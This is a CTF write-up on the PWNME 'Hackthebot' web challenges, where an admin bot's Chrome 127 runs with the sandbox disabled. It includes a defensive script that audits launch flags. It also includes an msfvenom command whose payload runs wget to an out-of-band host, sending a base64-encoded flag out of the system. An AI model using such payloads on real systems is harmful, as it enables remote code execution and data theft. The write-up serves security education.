Too Lazy to get XSS? Then use n-days to get RCE in the Admin bot


#pwnmectf #pwnme #web #ndays


  • Hackthebot 1 & 2 are web challenges from PWNME CTF
  • Both challenges shared the same instance: the first flag was stored in a cookie, while the second was located at /root/flag2.txt
  • The intended approach was to exploit XSS to leak the cookie, while the second challenge involved using DevTools in some way
  • But I was really surprised by their configuration
```javascript
const browser = await puppeteer.launch({
    headless: 'new',
    args: ['--remote-allow-origins=*', '--no-sandbox', '--disable-dev-shm-usage', `--user-data-dir=${browserCachePath}`]
});
```



  • The above code is from source/app.js and gets executed when the admin bot opens the link we provide
  • --no-sandbox flag was enabled, meaning that if I could compromise the renderer, gaining RCE would be ezPZ 😛
  • I quickly checked the browser version 🧐
```text
root@e23711a7c095:~/.cache# ls -la ~/.cache/puppeteer/chrome/
total 12
drwxr-xr-x 3 root root 4096 Mar  1 13:40 .
drwxr-xr-x 4 root root 4096 Mar  1 13:39 ..
drwxr-xr-x 3 root root 4096 Mar  1 13:40 linux-127.0.6533.88
```



  • They’re running Chrome 127 🤔
  • This version is vulnerable to multiple CVEs.
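The two findings above (sandbox switched off, Chrome build months behind stable) are exactly what a config review of an admin bot should catch. The script below is an added example, not code from the challenge or from Puppeteer: it audits a `puppeteer.launch()` args list for isolation-weakening flags, reads the Chrome major out of the puppeteer cache directory name, and shows a launch config that keeps the sandbox on. The risky-flag list, the `minMajor` threshold and the hardened config are my own assumptions, not a Puppeteer or Chrome API.

```javascript
const RISKY_FLAGS = {
  '--no-sandbox': 'renderer has no OS sandbox: a renderer bug becomes code execution on the host',
  '--remote-allow-origins=*': 'any origin may connect to the DevTools (CDP) websocket',
  '--disable-web-security': 'same-origin policy is disabled',
  '--remote-debugging-port': 'DevTools protocol port is exposed on the network',
};

// Return one {flag, reason} finding per risky flag present in `args`.
// Flags that take a value (e.g. --remote-debugging-port=9222) match on the
// prefix; --remote-allow-origins only counts when it is the wildcard.
function auditLaunchArgs(args) {
  const findings = [];
  for (const arg of args) {
    for (const [flag, reason] of Object.entries(RISKY_FLAGS)) {
      const valued = !flag.includes('=') && arg.startsWith(flag + '=');
      if (arg === flag || valued) findings.push({ flag, reason });
    }
  }
  return findings;
}

// Parse the directory name puppeteer creates under ~/.cache/puppeteer/chrome/
// (e.g. "linux-127.0.6533.88") into the Chrome major version, or null.
function chromeMajorFromCacheDir(dirName) {
  const m = /^[a-z0-9_]+-(\d+)\.\d+\.\d+\.\d+$/.exec(dirName);
  return m ? Number(m[1]) : null;
}

// True when the installed major is below the minimum the operator accepts;
// minMajor is an assumed value the operator keeps at the current stable release.
function isOutdated(installedMajor, minMajor) {
  return installedMajor === null || installedMajor < minMajor;
}

// Launch options that keep the sandbox on. Chrome will not start its sandbox
// as root, so the bot must run as an unprivileged user (with user namespaces
// available) rather than passing --no-sandbox. Assumed hardened config.
function hardenedLaunchOptions(browserCachePath) {
  return {
    headless: 'new',
    args: ['--disable-dev-shm-usage', `--user-data-dir=${browserCachePath}`],
  };
}

// Constructed input mirroring the challenge's launch() call.
const challengeArgs = ['--remote-allow-origins=*', '--no-sandbox',
  '--disable-dev-shm-usage', '--user-data-dir=/tmp/bot-cache'];
console.log(auditLaunchArgs(challengeArgs).map((f) => f.flag));
console.log(isOutdated(chromeMajorFromCacheDir('linux-127.0.6533.88'), 128));
```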




  • So I replaced the shellcode in the exploit and sent the link to the admin bot


  • And got the second flag PWNME{Th3re_ls_Mu1T1pL3_US4g3_Of_C4CH3:333} 😝
  • For the first flag:
```shell
msfvenom -p linux/x64/exec CMD='wget https://uglxpmedoaubicfpwdzk5zdyse62qt1id.oast.fun/flag1=$(cat</app/app.js|grep${IFS}PWNME{|base64)' -f py
```


  • This scenario underscored the importance of examining configurations closely, as they can sometimes lead to unintended paths.
  • I appreciate you taking the time to read this write-up :) hope you found it interesting! Thanks for reading! 😊


Hack The Box

It would be appreciated if you give me a respect+ on HTB